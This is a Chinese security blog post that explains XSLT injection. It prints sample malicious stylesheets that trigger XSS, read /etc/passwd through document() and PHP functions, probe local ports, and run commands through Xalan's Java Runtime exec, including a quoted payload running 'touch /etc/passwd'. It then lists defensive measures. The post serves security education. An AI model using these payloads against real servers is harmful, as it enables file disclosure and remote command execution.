应用安全系列之十五:XSLT注入

已于 2023-04-24 11:33:29 修改
阅读量2.2k 收藏 4
点赞数
分类专栏: Security 文章标签: 安全 服务器 运维
于 2021-03-11 12:33:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jimmyleeee/article/details/114639437
版权

本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施。

XSLT (Extensible Stylesheet Language Transformations)  是一种转换语言,主要是将一种XML文档转换为另外一种XML文档,或者其他格式的文档,例如:HTML和文本等。XSLT 使用 XPath 在 XML 文档中查找信息。XPath 被用来通过元素和属性在 XML 文档中进行导航。通过XSL进行转换可以在浏览器端进行,但是,如果有的浏览器不支持,就必须在服务器端进行转换。关于XSL的详细语法可以参考:XSLT - 转换

在转换过程中,如果转换的内容可以被攻击者控制,攻击者可以篡改输出的文档的内容,可以发起XSS攻击、读取文件系统的文件的内容,甚至是执行任意命令。示例如下:

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
    <xsl:template match="/">
		<script>alert(123)</script>								// 发起XXS攻击
		<xsl:copy-of select="document('/etc/passwd')"/>			// 读取文件内容

        <xsl:value-of select="document('http://localhost:22')"/> // 端口扫描
		
		// 执行任意命令
		<xsl:variable name="rtobject" select="rt:getRuntime()"/>
		<xsl:variable name="process" select="rt:exec($rtobject,'ls')"/>
		<xsl:variable name="processString" select="ob:toString($process)"/>
		<xsl:value-of select="$processString"/>

        <xsl:value-of select="php:function('readdir')"/>  // PHP的路径遍历
        <xsl:value-of select="php:function('file_get_contents','/etc/passwd')"/>
    </xsl:template>
  </xsl:stylesheet>

注意:在输出变量时,标签有个属性:disable-output-escaping,默认值为 "no"。如果值为 "yes",通过实例化 <xsl:text> 元素生成的文本节点在输出时将不进行任何转义。 比如如果设置为 "yes",则 "<" 将不进行转换。如果设置为 "no",则被输出为 "&lt;"。如下:

<xsl:value-of select="expression" disable-output-escaping="yes|no"/>

下面是在服务器端使用Java代码进行转换的一个示例代码:

            Source xsltSource = new StreamSource(new FileInputStream(xslFilename));
            TransformerFactory transFormer = TransformerFactory.newInstance();

            Source source = new StreamSource(xmlUrl);
            Result result = new StreamResult(System.out);

            transFormer.transform(source, result);

如果输入的xslFilename 可以被攻击者控制或者攻击者通过文件上传的漏洞预先上传一个文件,或者xsltSource输入的流的内容可以被攻击者控制,就可以发起XSLT注入攻击。一个攻击的示例可以参考:ESI Injection Part 2: Abusing specific implementations - GoSecure,注入的XML如下,可以直接参考:

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[touch /etc/passwd]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>

目前服务器端常用的解析库包括:Libxslt (Gnome), Xalan (Apache) and Saxon (Saxonica),在服务器端使用XSL时,需要注意一下几点:

  1.              能够避免使用功能XSLT,是最好的解决方案;
  2.              在生成XSL文档时,避免从不可信的来源获取数据;
  3.              在使用XSL的库时,禁止使用不安全的函数;
  4.              如果必须要从不可信的来源接受数据生成XSL文档,需要对内容进行HTML编码,关于HTML编码可以参考XSS文章。
  5.              输入验证,对不可信的数据源进行输入验证,除非输入的值,有明显的范围,可以很容易通过输入验证来保证安全,否则,不建议使用输入验证的解决方案。

如果有不妥之处,希望可以留言指出。谢谢!

参考:

http://xmlsoft.org/XSLT/

ESI Injection Part 2: Abusing specific implementations - GoSecure

XSLT 简介

XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations) - HackTricks

埃森哲 | 战略,咨询,数字,技术,运营

XSLT Injection Basics - Atlan Digital - Offensive Security Lab

渗透测试-XLST
cdyunaq的博客
05-09 2319
- XSLT简介 - XSL(可扩展样式表语言)是一种用于转换XML文档的语言,XSLT表示的就是XSL转换,转换后得到的一般都是不同的XML文档或其他类型文档,例如HTML文档、CSV文件以及明文文本文件等等。 一般来说,应用程序或模板引擎在处理不同文件类型时需要使用XSLT来进行数据转换。很多企业级应用比较喜欢使用XSLT,比如说,多用户发票应用程序可以使用XSLT来允许客户自定义它们的发票,客户可以根据自己的需求来修改发票信息以及格式。 其他常见应用: •报告功能 •多种格式的数据导出功能;
xslt注入
weixin_30460489的博客
11-16 415
XSL(可扩展样式表语言)是一种用于转换XML文档的语言,XSLT表示的就是XSL转换,而XSL转换指的就是XML文档本身。转换后得到的一般都是不同的XML文档或其他类型文档,例如HTML文档、CSV文件以及明文文本文件等等。 一般来说,应用程序或模板引擎在处理不同文件类型时需要使用XSLT来进行数据转换。很多企业级应用比较喜欢使用XSLT,比如说,多用户发票应用程序可以使用XSLT来允许客户自...
XSLT 实例
天元喜羊羊的博客
04-11 805
实例1: cdcatalog.xsl:
XSLT
反手一个bug的博客
12-18 711
&amp;lt;xsl:template&amp;gt; 元素 &amp;lt;xsl:template&amp;gt; 元素用于构建模板。 match 属性用于关联 XML 元素和模板。match 属性也可用来为整个 XML 文档定义模板。match 属性的值是 XPath 表达式(举例,match=&quot;/&quot; 定义整个文档)。 注意:由于 XSL 样式表本身也是一个 XML 文档,因此它总是由 XML 声明起始:&amp;lt
掌握XSLT控制XML样式及其在HTML和C#中的应用
4. **安全性**: 当使用XSLT处理XML数据时,需要注意XSLT注入的问题。恶意构造的XML或XSLT可能会破坏页面布局或泄露敏感信息。 5. **实现方式**: 通常会使用`<xsl:apply-templates>`和`<xsl:template>`等标签来定义...
【libxml2安全攻略】:防御XML注入与验证漏洞的金钥匙
随着XML技术在各领域的广泛应用,其安全问题也日益凸显,尤其是XML注入和验证漏洞对系统的安全构成严重威胁。本文首先介绍了libxml2库的基础知识和XML安全的相关概念,然后深入分析了XML注入攻击的原理、风险评估...
ElementTree.ElementTree安全性分析:防止XML注入攻击的专家指南
[ElementTree.ElementTree安全性分析:防止XML注入攻击的专家指南](https://www.askpython.com/wp-content/uploads/2020/03/xml_parsing_python-1024x577.png) # 1. ElementTree.ElementTree概览 ## 了解Element...
mod-xslt for Apache 2.0.35 and later-开源
07-03
5. **安全性**:由于XSLT转换可能会处理敏感数据,因此要确保对输入进行验证和过滤,防止XSL注入攻击。此外,限制服务器上的样式表访问权限也是必要的安全措施。 6. **性能优化**:考虑到XSLT转换可能对服务器性能...
【VB6.0封装EXE安全机制】:打造安全无漏洞的Excel应用程序
![【VB6.0封装EXE安全机制】:打造安全无漏洞的Excel应用程序]...接着,深入分析了EXE文件中常见安全漏洞的类型、成因及对Excel应用程序的潜在影响。第三章提出了安全机制的理论基础,强调
C#发现之旅第二讲 C#-XSLT开发
水煮鱼的博客
09-25 1620
在未来的C#发现之旅中,我们按照由浅入深,循序渐进的步骤,一起探索和发现C#的其他未知的领域,更深入的理解和掌握使用C#进行软件开发,拓宽我们的视野,增强我们的软件开发综合能力。
xslt 调用java_XSLT 调用java
weixin_39534149的博客
02-12 190
XSLT调用JS http://www.ibm.com/developerworks/cn/xml/tips/x-tipxsltjs/index.htmlXSLT调用JAVA http://unmi.cc/xslt-call-java-methodJava代码 packageorg.lvsenlin;importjava.text.SimpleDateFormat;importjava...
XSLT入门
Just Code
07-13 155
学习资源: 1. http://www.w3school.com.cn/xsl/ 2. https://www6.software.ibm.com/developerworks/cn/education/xml/x-introxslt/section2.html     1.XSLT的概念 我们首先来澄清一个概念,大家可能听说过XSL(eXtensible Stylesheet...
XSLT知识
菜鸟通往架构师之路
09-22 1130
ESB最常见的用途是将传入或者传出的消息从一种格式转换到另一种格式,在ESB中我们利用xslt文件实现。 1.什么是XSLT? 首先提到XSLT不得不提到XSL,XSL指扩展样式表语言(EXtensible Stylesheet Language). 在计算机科学中,XSLT是扩展样式表转换语言(ExtensibleStylesheetLanguage Transformations)的简称
利用XSLT继续击垮XML
weixin_34023982的博客
03-08 151
小飞 · 2016/02/23 11:260x00 介绍XSL首先我们要说的是,这个XSLT应该这么断句:XSL-T。XSL指的是EXtensible Stylesheet Language,中文被很直白地翻译成扩展样式表语言。这种语言和xml有莫大关系:XSL之于XML相当于CSS之于HTML。HTML的每个元素都是预定义好的,比如&lt;table&gt;用来定义表格,浏览器也知道怎么识别这个...
XSLT模版注入漏洞
最新发布
l_l_c_q的博客
08-16 1097
XSLT模版注入
三个安全漏洞: XSLT 样式表处理、Solaris 10 绑定、Sun Cluster Software 安全漏洞(eNew 第二十八期/2007.09)
枫梓的贝壳
09-29 619
XSLT样式表处理的安全漏洞会影响到Sun Java System Application Server 和 Web 服务器Sun Alert ID 102992: Sun Java System Application Server 和 Sun Java System Web Server的部分发行版没有安全地处理转换XML签名的XLST样式表,可能允许执行恶意的XSLT样式表。这个问题会影
Goby 漏洞发布|Splunk Enterprise XSLT 命令执行漏洞(CVE-2023-46214)
m0_46699477的博客
11-26 593
Splunk Enterprise 是美国 Splunk 公司的一套数据收集分析软件。该软件主要用于收集、索引和分析及其所产生的数据,包括所有IT系统和基础结构(物理、虚拟机和云)生成的数据。Splunk Enterprise 存在命令执行漏洞,该漏洞源于不会安全地清理用户提供的可扩展样式表语言转换 (XSLT),攻击者利用该漏洞可以上传恶意 XSLT,从而在 Splunk Enterprise 实例上远程执行命令。
【漏洞挖掘】——21、RPO漏洞挖掘攻防
Fly_鹏程万里
03-03 3237
Gareth Heyes在2014年首次提出了一种新型攻击手法—RPO(Relative Path Overwrite)相对路径覆盖,该漏洞是一种利用相对URL路径覆盖目标文件的一种攻击手段,其主要依赖于服务器和浏览器的解析差异性并利用前端代码中加载的css/js的相对路径来加载其他文件,最终使得浏览器将服务器返回的不是css/js的文件当做css/js来解析,从而导致XSS,信息泄露等漏洞产生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值